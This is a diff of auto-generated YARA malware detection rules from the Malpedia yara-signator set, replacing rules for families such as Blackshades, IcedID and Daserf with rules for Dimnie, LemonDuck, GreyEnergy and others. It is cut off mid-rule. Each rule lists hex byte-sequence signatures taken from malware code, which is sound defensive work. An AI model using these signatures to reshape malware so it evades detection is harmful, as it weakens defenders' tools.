source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.blackshades_auto.yar#L1-L117" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dimnie" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dimnie_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "5be1fd8de19e4a88da957f4843427153e72a697b528878c27f4d0e3032429536" + logic_hash = "0f3f067f034444fcc73a96e10a6a53b5dc6ee2b790aaefb3f5f862bcac5e875a" score = 75 quality = 75 tags = "FILE" @@ -181193,32 +183954,32 @@ rule MALPEDIA_Win_Blackshades_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff9e0460ff34 6c 60 ff0a } - $sequence_1 = { 08fe f5 0200 0000 6c 70ff 9e } - $sequence_2 = { 70ff f30004eb f4 02eb fb cf } - $sequence_3 = { 351cff1e55 2c00 0d6c04ff1b c700fb301cc9 } - $sequence_4 = { 58 2f 60 ff6c74ff } - $sequence_5 = { 2a23 60 ff1b 0d002a460c fff5 0200 0000 } - $sequence_6 = { 6c ff4a71 70ff 00746c78 ff1b } - $sequence_7 = { 6c ff4a71 70ff 00746c78 ff1b 4a } - $sequence_8 = { ff6c48ff 6c 4c ff40fc } - $sequence_9 = { ff1b 0d002a460c fff5 0200 0000 6c } + $sequence_0 = { 7605 8b450c eb54 8b550c 2b5508 83fa01 751c } + $sequence_1 = { 33c0 eb6e 8b4508 3b450c 7505 8b4508 } + $sequence_2 = { 8945f4 8b45f4 c1e804 8945f4 8b4df8 83c101 } + $sequence_3 = { 8b550c 2b5508 8955f8 0f31 8945f4 8b45f4 c1e804 } + $sequence_4 = { eb6e 8b4508 3b450c 7505 8b4508 eb61 } + $sequence_5 = { 2b5508 83fa01 751c 0f31 } + $sequence_6 = { 8b4508 eb61 8b4d08 3b4d0c 7605 8b450c } + $sequence_7 = { 8b4d0c 8a55af 885102 837d1002 7e13 8b4508 0fb64802 } + $sequence_8 = { 8b4510 8b08 83e107 8b5510 890a } + $sequence_9 = { c70201000000 8b4508 8b08 83e10f 8b5508 890a 8b450c } condition: - 7 of them and filesize <999424 + 7 of them and filesize <212992 } -rule MALPEDIA_Win_Daserf_Auto : FILE +rule MALPEDIA_Win_Ati_Agent_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "fffb2935-58a7-5828-bf22-dd469fea2b59" + id = "aa24ad24-7301-5b4c-b856-1e1a4ef6bc2f" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.daserf" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.daserf_auto.yar#L1-L167" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ati_agent" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ati_agent_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "194f8b1f42d6928a216ace153b63a40c6d813ea5df60a79ed82a9b2168ff69ee" + logic_hash = "724a5b5da348b3df222a7dbd0e29ff96d89b57311395a8ccd89f777e74414508" score = 75 quality = 75 tags = "FILE" @@ -181232,38 +183993,32 @@ rule MALPEDIA_Win_Daserf_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8945cc ff15???????? 8945d0 8d45b4 } - $sequence_1 = { b808380000 e8???????? 53 56 } - $sequence_2 = { 81eb7ee5b031 81c30d782341 81c3db5d1091 81eb73ad763b 054ce1128c 81c3cc3c3014 } - $sequence_3 = { 81c3ad482863 81eb8c570d21 2d21583cc4 2da932ed1b 81c3f8ff2857 81eb46159323 } - $sequence_4 = { 81eb4e0e3377 87c0 81ebfb04024c 87ff 2dfaa67876 } - $sequence_5 = { 81c394c7d041 81eb6afed62a 81c3bed1834b 81eb826387e9 81c3d7e98170 2d844df6b2 } - $sequence_6 = { 50 ffd6 ffb56814ffff 8d85bc4fffff 50 } - $sequence_7 = { 2d4936916d f7d1 f7d1 2d99d06187 f7d1 f7d1 } - $sequence_8 = { 8bc9 81c3c9920a05 95 89ac2400f2ffff } - $sequence_9 = { 7500 81c3e109e0f6 8bc0 0537d68276 9b 81c38da225f6 87c9 } - $sequence_10 = { eb0e ff75fc ffd7 3bf3 7403 56 } - $sequence_11 = { 81c327f27a10 7500 81ebc884a519 7500 81eb3a0de80d 87db 81c3b119330a } - $sequence_12 = { 2d4abc1884 90 2dea9bf526 7500 } - $sequence_13 = { 81ebf74ea63a f7d1 f7d1 81eb199760ae 9b } - $sequence_14 = { 2d966cdd4c 2d81c26ac5 81c32b73f252 81c32bef6e96 81c3b4dacce0 } - $sequence_15 = { 81eb075e2ddb 9b 81c35a11e727 97 89bc2440f5ffff } + $sequence_0 = { 488bc8 ff15???????? 488d1548a20000 488bce 488905???????? } + $sequence_1 = { e8???????? 488d2d24a60000 4c8d250dd80000 83f8ff 7435 488bcf e8???????? } + $sequence_2 = { 488d442460 488d942490010000 4533c9 4889442448 48894c2440 } + $sequence_3 = { 488b05???????? 4833c4 4889442438 498bf0 488bfa 488bd9 } + $sequence_4 = { 488d0526d80000 488d0cc8 48890f ff15???????? } + $sequence_5 = { e9???????? 4881ec28050000 488b05???????? 4833c4 4889842410050000 488b05???????? 4885c0 } + $sequence_6 = { 488d8c24f0000000 ba04010000 4889442420 e8???????? 4c8d5c2438 488d9424f0000000 41b919010200 } + $sequence_7 = { 442bc0 488b442450 488d0d85be0000 488b0cc1 } + $sequence_8 = { 897c2428 897c2420 c784248000000068000000 ff15???????? } + $sequence_9 = { 8bf8 85c0 750d 488bce e8???????? e9???????? 4c8d2d6dc10000 } condition: - 7 of them and filesize <245760 + 7 of them and filesize <172032 } -rule MALPEDIA_Win_Rambo_Auto : FILE +rule MALPEDIA_Win_Lemonduck_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "9952c16f-0ad8-5b79-a375-78c277443f5b" + id = "731c6313-f288-5766-8bd2-365369510b0a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rambo" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rambo_auto.yar#L1-L172" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lemonduck" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lemonduck_auto.yar#L1-L114" license_url = "N/A" - logic_hash = "289c05fe82444eba5e21e680847ee18f8bd6fcd3320474143e269d581daca21f" + logic_hash = "45ef0f5ff171ed9ba03997994f483fd024a13ee436b3a8cb1b81df72104021e2" score = 75 quality = 75 tags = "FILE" @@ -181277,40 +184032,32 @@ rule MALPEDIA_Win_Rambo_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff7508 e8???????? 59 50 ff7508 ff15???????? 56 } - $sequence_1 = { e8???????? ff750c 8d85ecfdffff 50 e8???????? } - $sequence_2 = { ff15???????? 83c41c 6a01 58 5e c9 } - $sequence_3 = { 85f6 7437 56 6a01 } - $sequence_4 = { ff7508 8d85f8feffff 50 e8???????? 8065fe00 8d45fc 50 } - $sequence_5 = { 83c428 6a32 ff15???????? 8d85f8faffff 50 68???????? } - $sequence_6 = { 56 57 8d85f8faffff 6a01 50 ff15???????? 80a43df8faffff00 } - $sequence_7 = { 50 8d85f8feffff 50 c645fc72 } - $sequence_8 = { 756b 57 b940000000 8d7c240d 8844240c f3ab } - $sequence_9 = { f3aa 8bcb 8d7c2474 8bc1 } - $sequence_10 = { e8???????? 8d4c2410 c684240004000007 e8???????? 68b6000000 8d542414 } - $sequence_11 = { 8d8c2488000000 e8???????? 57 57 8d4c2424 } - $sequence_12 = { e8???????? 8d4c2428 c684240004000005 e8???????? 8d4c2414 c684240004000004 } - $sequence_13 = { 8b35???????? a3???????? ffd6 3db7000000 7418 } - $sequence_14 = { 89442418 8b4309 84c9 7403 50 } - $sequence_15 = { f3a5 8bcb 8d9424f8020000 83e103 f3a4 bf???????? 83c9ff } + $sequence_0 = { 41c1e018 42330c22 450bc8 46334c2204 4433d9 410fb64625 4533d1 } + $sequence_1 = { 488b7c2430 33c0 488983a0000000 488983a8000000 488983b0000000 488983b8000000 488983c0000000 } + $sequence_2 = { 418bc0 80f909 410f47c2 02c1 41884102 410fb64d01 80e10f } + $sequence_3 = { 488b89d8000000 48896c2438 4889742440 4883f9ff 7414 ff15???????? 8b4758 } + $sequence_4 = { 488d15d2280a00 488bcb ff15???????? 488905???????? 4885c0 0f8474010000 488d159a280a00 } + $sequence_5 = { 488d05c6ba0000 488905???????? 488d0558c70000 488905???????? 488d05bad20000 488905???????? 488d054ce30000 } + $sequence_6 = { 41c1e908 410fb6c7 41c1ef08 418bb48a50951600 400fb6cf 458ba48250951600 410fb6c6 } + $sequence_7 = { 482bc1 4883c0f8 4883f81f 0f8798000000 ba4f000100 e8???????? 90 } condition: - 7 of them and filesize <57344 + 7 of them and filesize <10011648 } -rule MALPEDIA_Win_Icedid_Auto : FILE +rule MALPEDIA_Win_Bolek_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f1fe8329-9566-5f3c-8226-7a3fb9936918" + id = "21f1a0ba-06a1-5668-aea4-333af031f0f6" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.icedid_auto.yar#L1-L298" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bolek" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bolek_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "35bc9d0f5535131e0ac355ad775af24bc4cac838dad6434eced01ac7afcde501" + logic_hash = "28c372302adc63618e82259e643572bec2793a354bb442ed761054ecd6bf8112" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -181322,54 +184069,32 @@ rule MALPEDIA_Win_Icedid_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 85c0 7511 56 57 ff15???????? } - $sequence_1 = { 50 6801000080 ff15???????? eb13 } - $sequence_2 = { 803e00 7427 6a3b 56 ff15???????? 8bf8 } - $sequence_3 = { ff15???????? 85c0 7420 837c241000 7419 } - $sequence_4 = { 56 ff15???????? 8bf8 85ff 7418 c60700 } - $sequence_5 = { 68???????? 6a00 ff15???????? 33c0 40 } - $sequence_6 = { 50 ff15???????? 8bf7 8bc6 eb02 } - $sequence_7 = { eb0f 6a08 ff15???????? 50 ff15???????? 8906 } - $sequence_8 = { e8???????? 8bf0 8d45fc 50 ff75fc 6a05 } - $sequence_9 = { 743f 8d5808 0fb713 8954241c } - $sequence_10 = { 03c2 eb5c 8d5004 89542414 8b12 85d2 } - $sequence_11 = { 66c16c241c0c 0fb7d2 c744241000100000 663b542410 } - $sequence_12 = { 47 83c302 3bfd 72c4 } - $sequence_13 = { 8d4508 50 0fb6440b34 50 } - $sequence_14 = { 89542414 8b12 85d2 7454 8d6af8 d1ed } - $sequence_15 = { 47 3b7820 72d1 5b 33c0 40 } - $sequence_16 = { ff5010 85c0 7407 33c0 e9???????? } - $sequence_17 = { 8a4173 a808 75f5 a804 7406 } - $sequence_18 = { ff15???????? 85c0 750a b8010000c0 } - $sequence_19 = { 41 02fd c6430503 eb21 41 0fb6c1 } - $sequence_20 = { 48 8bfa 48 8bf1 45 8d41ce e8???????? } - $sequence_21 = { 7407 41 2bcd 7515 eb0f 44 } - $sequence_22 = { 48 8d442458 48 8bf9 48 } - $sequence_23 = { 8bce 894348 48 8b15???????? } - $sequence_24 = { 7307 4c8b742420 eba1 488bb590020000 } - $sequence_25 = { 57 4883ec30 488bf2 488bd9 ff15???????? 4885c0 } - $sequence_26 = { 7409 8b4c2478 493b0e 741e 498b1f 4885db } - $sequence_27 = { 33d2 488bc8 ff15???????? 488bb590020000 4885f6 7414 ff15???????? } - $sequence_28 = { 33d2 488bce ff15???????? 8bd8 49891e 85c0 } - $sequence_29 = { 4533c0 c740c803000000 ba00000080 ff15???????? 488bf0 4883f8ff 7507 } - $sequence_30 = { 33ff 4d8bf0 482178d8 4c8bfa } - $sequence_31 = { 5d c3 488b0d???????? 488d050d1e0000 } + $sequence_0 = { 894c2454 8bc7 8b8c24ac000000 8bdf 0facc808 33ed c1e318 } + $sequence_1 = { 3b31 72e1 51 e8???????? 59 8bc7 5f } + $sequence_2 = { 8bcd 0fa4c117 0bf9 c1e017 0bd8 8bcd 8b442460 } + $sequence_3 = { 8d86f4000000 50 e8???????? 83c418 56 6880000000 ff750c } + $sequence_4 = { dd442418 dc0d???????? dd1c24 68???????? 8b1d???????? 8d44242c 6a40 } + $sequence_5 = { eb7a 3c03 0f85bf000000 53 6a01 8d442428 50 } + $sequence_6 = { 85c9 746f 803900 746a 6a2c 51 890f } + $sequence_7 = { e8???????? eb07 814f7c00040000 5f 5e 5d 5b } + $sequence_8 = { 89448c20 41 83c304 ebd0 8bac2434030000 8b9c2430030000 85db } + $sequence_9 = { 83e4f8 83ec68 8364242000 8364242400 8b450c c744241001234567 c744241489abcdef } condition: - 7 of them and filesize <303104 + 7 of them and filesize <892928 } -rule MALPEDIA_Win_Qaccel_Auto : FILE +rule MALPEDIA_Win_Webc2_Ugx_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1dd927f1-4f29-5825-9031-a85900b0d7a3" + id = "af26c213-66d2-5675-81ab-6f59f34ddb98" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.qaccel" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.qaccel_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_ugx" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.webc2_ugx_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "fe81ee4455e2d861af0930707bfdb209646482eb98d90e9c040e2aaf3beb1c92" + logic_hash = "c0369798dbc9b5bf726746a205f3377c225f0e99dd41f08ae5697ccf08cc0c9d" score = 75 quality = 75 tags = "FILE" @@ -181383,32 +184108,32 @@ rule MALPEDIA_Win_Qaccel_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 68???????? 50 64892500000000 56 57 8bf9 0f8816000000 } - $sequence_1 = { 5f 5f 5f 5f 5f b801000000 5e } - $sequence_2 = { 53 03c6 51 50 c7450c00000000 } - $sequence_3 = { 83cbff 0f8819000000 0f8913000000 5f 5f 5f 5f } - $sequence_4 = { 8b4020 6a05 50 ffd6 50 e8???????? 8b4820 } - $sequence_5 = { 8d55e8 51 52 ff15???????? 8b45fc 8b4df8 6a00 } - $sequence_6 = { 50 ffd6 50 e8???????? 0fbe4dff 8b5020 6801001c00 } - $sequence_7 = { 5f 5f 5f 68???????? ff15???????? 85c0 } - $sequence_8 = { 5f 5f 5f 5f 6a00 50 } - $sequence_9 = { 5f 5f 5f 66a1???????? 8b3d???????? 6800010000 668903 } + $sequence_0 = { 8d458c 895dec 50 8d8568ffffff 50 } + $sequence_1 = { 59 745e 8d4640 50 ff750c ffd3 59 } + $sequence_2 = { 50 ff15???????? 85c0 7455 8d85a8feffff 53 50 } + $sequence_3 = { ff9698060000 8bf8 85ff 0f84b5000000 8d866e0c0000 50 57 } + $sequence_4 = { 8d85a8feffff 68???????? 50 ffd6 } + $sequence_5 = { 50 ff55fc 8bc3 eb48 ff15???????? 56 } + $sequence_6 = { 8d8584fdffff 50 ff55bc 50 8d8584fdffff 50 } + $sequence_7 = { 8d8584f9ffff 57 50 ff55f0 } + $sequence_8 = { ff5508 ff7510 e9???????? 53 } + $sequence_9 = { 8d85a8feffff 68???????? 50 ffd6 8d85a8feffff 68???????? 50 } condition: - 7 of them and filesize <106496 + 7 of them and filesize <57344 } -rule MALPEDIA_Win_Swen_Auto : FILE +rule MALPEDIA_Win_Chinad_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7f9f6459-0c0a-509f-9c87-8a68bae77e34" + id = "55179322-c960-5946-aa14-87280de490d7" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.swen" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.swen_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinad" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.chinad_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "6a4f1002b8a4868bbe8661a8400f2e2886c507211772c905c6406fbef250b4fb" + logic_hash = "f63725bd92056d22834dfb19b05368c2071df890649a72d3254d014778d263a0" score = 75 quality = 75 tags = "FILE" @@ -181422,32 +184147,32 @@ rule MALPEDIA_Win_Swen_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ab 8d85a8fcffff 50 8d8564fcffff 50 56 56 } - $sequence_1 = { 6a05 59 be???????? 8dbd1cfeffff f3a5 66a5 } - $sequence_2 = { 68b0040000 ff15???????? c9 c3 55 8bec 6aff } - $sequence_3 = { 33c9 85c0 0f95c1 41 890d???????? 8b450c 3905???????? } - $sequence_4 = { 59 59 50 8d8594fcffff 50 } - $sequence_5 = { 0fbe4602 8d48df 83f951 7408 83c00a 83f85c 755f } - $sequence_6 = { 53 6880000000 6a04 53 6a03 6800000040 8d85e4feffff } - $sequence_7 = { e8???????? 8d85d8fdffff 50 8d8550ffffff 50 e8???????? 8d4603 } - $sequence_8 = { 0f84b2000000 895de0 8b4de4 c1e902 8b45e0 3bc1 0f839e000000 } - $sequence_9 = { 3bc3 7410 8d8d80feffff 2bc1 40 40 89857cfeffff } + $sequence_0 = { c7850cffffff00000000 eb55 c78550ffffffbc264300 8b9550ffffff 83c201 8995b4feffff 8b8550ffffff } + $sequence_1 = { 8b85a8feffff 899485acfeffff e9???????? b904000000 6bd100 8b4508 8b0c10 } + $sequence_2 = { 2bf8 8bc2 c1f819 03f0 897dec c1e019 } + $sequence_3 = { 895de8 1bde 0145f4 8b75ac 119d7cffffff 8b5dec 81c300001000 } + $sequence_4 = { 0fa4c119 c1ee07 c1e019 0bd1 0bf0 31b514fdffff } + $sequence_5 = { 0fa4f701 6a13 03f6 03b55cffffff 89b560ffffff 137dcc 81c600000001 } + $sequence_6 = { c1c802 33c8 8b85d4feffff 8bd8 03ca 2385d8feffff } + $sequence_7 = { 81d7745dbe72 019d14fdffff 11bd38fdffff 33d2 0facc81c c1e604 } + $sequence_8 = { 8b4e24 83c40c c1e903 b838000000 83e13f 83f938 7205 } + $sequence_9 = { b894280000 e8???????? a1???????? 33c5 8945fc c78570d7ffff80280000 8d8570d7ffff } condition: - 7 of them and filesize <286720 + 7 of them and filesize <598016 } -rule MALPEDIA_Win_Chaperone_Auto : FILE +rule MALPEDIA_Win_Grey_Energy_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5069c84b-f6f9-588d-8536-63d238bdb1de" + id = "4a36cbdc-dd01-583b-ac49-dd33a3c83ba9" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chaperone" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.chaperone_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grey_energy" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.grey_energy_auto.yar#L1-L164" license_url = "N/A" - logic_hash = "9d40dc4ee44ea2fe4f6bf05be1cccf6d78aa19e4569d2284fce73479ea6dfe7a" + logic_hash = "48bebd474d43043ec7179ca6aa1110529eaa285ee6fd70578731385cb5b6f92e" score = 75 quality = 75 tags = "FILE" @@ -181461,32 +184186,39 @@ rule MALPEDIA_Win_Chaperone_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { f3a4 488dbc2458010000 488d35d6490100 b918000000 f3a4 48c784245001000000000000 83bc249002000000 } - $sequence_1 = { 85c9 782e 3b0d???????? 7326 4863c9 488d15f8ca0100 488bc1 } - $sequence_2 = { eb05 1bc0 83d8ff 85c0 0f8475010000 488d15aeaf0100 488d8c24ec040000 } - $sequence_3 = { 488d9424a8020000 488b4c2430 ff15???????? 81bc24a802000003010000 0f8486000000 } - $sequence_4 = { 751f 83bc24d001000002 7515 83bc24c801000001 720b c78424a801000005000000 83bc24c401000006 } - $sequence_5 = { 488d94088c020000 488b8c2438490000 e8???????? 89842444490000 83bc244449000000 } - $sequence_6 = { ff15???????? 488905???????? 48833d????????00 750b c78424c801000002000000 488d9424a0020000 488b8c2480030000 } - $sequence_7 = { 0fb702 66898424d0000000 488d9424f0020000 488d8c24d0000000 ff15???????? 488d8c24d0000000 ff15???????? } - $sequence_8 = { ff15???????? 66ba5c00 488d4c2440 e8???????? 4889842450020000 488b842450020000 4883c002 } - $sequence_9 = { 49c1fe05 4c8d3d40cc0100 83e61f 486bf658 4b8b04f7 0fbe4c3008 83e101 } + $sequence_0 = { 6800000008 57 53 53 } + $sequence_1 = { e8???????? 68???????? 8945cc e8???????? 68???????? 8945d4 e8???????? } + $sequence_2 = { 53 53 6800000008 57 } + $sequence_3 = { 8945d4 e8???????? 68???????? 8945d0 e8???????? } + $sequence_4 = { 0345f0 0fbe08 8b45f0 33d2 } + $sequence_5 = { 81e1ff000000 8b45ec 8b55f8 66890c42 } + $sequence_6 = { 8b45f8 0345ec 8808 eb10 } + $sequence_7 = { 8b55f0 8b7508 668b1456 66891441 } + $sequence_8 = { 66890c42 eb14 8b45ec 8b4df8 } + $sequence_9 = { 53 ff15???????? 8b75f8 85f6 } + $sequence_10 = { 8b4d08 0fb70c41 8b45f0 33d2 } + $sequence_11 = { 50 6a40 ff15???????? 8945f8 837df800 7507 } + $sequence_12 = { 837df800 7507 33c0 e9???????? c745f004000000 } + $sequence_13 = { 7407 c60100 41 48 75f9 ff75f8 } + $sequence_14 = { 48 75fa 56 ff15???????? ff75f8 } + $sequence_15 = { 57 ff75e8 ff75f0 ffd6 } + $sequence_16 = { e8???????? 8b4508 3bc7 7430 57 } condition: - 7 of them and filesize <373760 + 7 of them and filesize <303104 } -rule MALPEDIA_Win_Huskloader_Auto : FILE +rule MALPEDIA_Win_Unidentified_037_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "2b71c66f-6603-595c-99bb-89c942583260" + id = "9e4cd69e-744d-5d0c-b193-3d15e535bfdb" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.huskloader" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.huskloader_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_037" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_037_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "0b5c5ed5027920c73090f364afb1f0be41c97145cf9de72e357bac2712d50fca" + logic_hash = "ab9d444ded76b509036904b157e446e552ae52ed50151a488fb9c47db68bb4eb" score = 75 quality = 75 tags = "FILE" @@ -181500,32 +184232,32 @@ rule MALPEDIA_Win_Huskloader_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8bc7 83e03f 6bc838 8b0495e88d0110 } - $sequence_1 = { 59 e9???????? c745e003000000 e9???????? c745e4c05e0110 ebb8 d9e8 } - $sequence_2 = { 6a00 681f000f00 50 ff15???????? 85c0 } - $sequence_3 = { 740e 50 e8???????? 83a6e88d011000 59 83c604 81fe00020000 } - $sequence_4 = { 8d043b 8b3485601f0110 8d4601 8945fc 8a06 46 } - $sequence_5 = { 57 8bb81c060000 6a40 6800300000 56 6a00 ff15???????? } - $sequence_6 = { 85c0 7411 8b35???????? b98b010000 } - $sequence_7 = { 7420 6bc618 57 8db8288c0110 57 ff15???????? } - $sequence_8 = { 8b35???????? 85f6 7420 6bc618 57 8db8288c0110 57 } - $sequence_9 = { 0fb704850c3b0110 8d048508320110 50 8d8590faffff 03c7 50 } + $sequence_0 = { 85c0 a3???????? 740c 8b4c2408 8b542404 51 52 } + $sequence_1 = { 33c0 33d2 33ff 8a0c1f 80f920 7405 80f930 } + $sequence_2 = { 7506 8b15???????? 8d8424b8040000 52 50 ff15???????? } + $sequence_3 = { 8a56ff 83e23f 41 4d 8a82d00c0110 8841ff 759c } + $sequence_4 = { 8b4d20 8b5500 8b4504 8bb424f0040000 51 52 50 } + $sequence_5 = { ff15???????? 84c0 742d 8b4608 8b5604 8d8dccfcffff } + $sequence_6 = { 8841ff 759c 5d eb04 8b742410 85ff 7667 } + $sequence_7 = { 743e 80f920 7439 80f930 7c0d 80f937 7f08 } + $sequence_8 = { 8b5c2408 8b4314 83f8ff 0f84b1000000 c1e005 8bd0 a1???????? } + $sequence_9 = { 5e 8b8c241c100000 64890d00000000 81c428100000 c3 83c1fe } condition: - 7 of them and filesize <229376 + 7 of them and filesize <167936 } -rule MALPEDIA_Win_Shakti_Auto : FILE +rule MALPEDIA_Win_Urausy_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "535cf33d-f06d-5859-b025-0ff160716ffb" + id = "42f215cc-3fcb-5d25-8a29-1c5fcfaf0e92" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shakti" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.shakti_auto.yar#L1-L172" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.urausy" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.urausy_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "6f5489cc7281ed05aa1395fcaba968324612a285b4f1d07b39699fdb3c984697" + logic_hash = "4f1d0bce8598e73699b4a743f6a21ef45b27ed44d43ef0837b1c95c90d3c9c6b" score = 75 quality = 75 tags = "FILE" @@ -181539,40 +184271,34 @@ rule MALPEDIA_Win_Shakti_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8945ec 8b4dd4 83c102 894dd4 e9???????? 8b55c0 } - $sequence_1 = { 0fb711 81fa4d5a0000 752e 8b45c0 8b483c } - $sequence_2 = { 8b45fc 8b4dd8 0308 894df0 8b55fc } - $sequence_3 = { 0fb7c2 83f801 753d b9ff0f0000 8b55f0 66230a 0fb7c1 } - $sequence_4 = { 8b45c0 03423c 8945f8 6a40 } - $sequence_5 = { 52 6a00 ff55e4 8945d8 8b45f8 8b4854 894de0 } - $sequence_6 = { 8b45e0 8b0c10 034dc0 baff0f0000 8b45f0 } - $sequence_7 = { 8b55f8 0355c0 8955f8 8b45f8 } - $sequence_8 = { 8b742408 85f6 741e 803e00 7512 ff760c e8???????? } - $sequence_9 = { ff34c5b4a24000 53 57 e8???????? 83c40c 85c0 } - $sequence_10 = { 50 ff759c ff15???????? 85c0 740d 837d9000 } - $sequence_11 = { 8bff 55 8bec 8b4508 33c9 3b04cd10a04000 7413 } - $sequence_12 = { ff15???????? 89459c 83f8ff 7507 32c0 e9???????? 57 } - $sequence_13 = { bf04010000 57 8d860e080000 50 6a00 } - $sequence_14 = { 6a08 50 890d???????? ff15???????? } - $sequence_15 = { 837dd400 a1???????? 7423 c700b8000000 a1???????? } + $sequence_0 = { 6a00 68???????? 68???????? ff7508 e8???????? 6a00 ff35???????? } + $sequence_1 = { 8bd3 81c2a5000000 50 53 52 51 } + $sequence_2 = { ff75e4 e8???????? 8945e8 ff35???????? } + $sequence_3 = { 6a01 ff35???????? e8???????? 6a00 68???????? 68???????? } + $sequence_4 = { c21000 55 8bec 81c4ecefffff } + $sequence_5 = { 0f8585000000 6814000000 68???????? 6a04 8d8500fcffff 50 e8???????? } + $sequence_6 = { 8d85dcf7ffff 50 57 56 } + $sequence_7 = { 833d????????00 0f8fae050000 c705????????01000000 ff35???????? 8f45f0 ff35???????? 8f45f4 } + $sequence_8 = { e8???????? ff75fc e8???????? 8b45f8 c9 c20400 ff25???????? } + $sequence_9 = { e8???????? b800000000 c9 c21400 } condition: - 7 of them and filesize <191488 + 7 of them and filesize <98304 } -rule MALPEDIA_Win_Beepservice_Auto : FILE +rule MALPEDIA_Win_Unidentified_088_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1d7d7c47-2c0e-5f10-8d42-753504cd309b" + id = "008a08cf-eb70-5951-921d-71ebeefbb775" date = "2023-12-06" modified = "2023-12-08" - reference = 